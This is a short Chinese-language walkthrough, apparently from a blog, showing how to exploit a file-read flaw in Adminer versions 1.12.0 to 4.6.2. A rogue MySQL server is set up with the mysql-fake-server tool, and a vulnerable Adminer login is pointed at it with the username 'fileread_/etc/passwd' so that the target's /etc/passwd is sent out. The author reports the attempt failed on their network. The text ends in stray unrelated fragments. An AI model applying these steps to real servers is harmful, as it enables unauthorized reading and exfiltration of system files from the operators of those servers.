Adminer是一個PHP編寫的開源數據庫管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等數據庫。在其版本1.12.0到4.6.2之間存在一處因為MySQL LOAD DATA LOCAL導致的文件讀取漏洞。?
一、偽造服務器
利用mysql-fake-server偽造服務器端,下載地址:GitHub - 4ra1n/mysql-fake-server: 純 Java 實現的 MySQL Fake Server | 支持 GUI 版和命令行版 | 支持反序列化和文件讀取的利用方式 | 支持常見的 GADGET 和自定義 GADGET 數據 | 根據目標環境自動生成匹配的 PAYLOAD | 支持 PGSQL 和 DERBY 的利用
Bind IP填寫本地IP:0.0.0.0,Bind Port填寫3306,Cmd file填寫要讀取的文件:/etc/passwd,
Generate:jdbc:mysql://ip:port?user=fileread_/etc/passwd
二、漏洞利用
在存在漏洞的登錄界面填寫服務器:192.168.8.179:3306,用戶名填寫:fileread_/etc/passwd
之后就可以讀取目標文件了,但由于我的網絡原因未能讀取到
:RKNN-ToolKit-lite2板端推理)
+錯排講解)
)
)
)
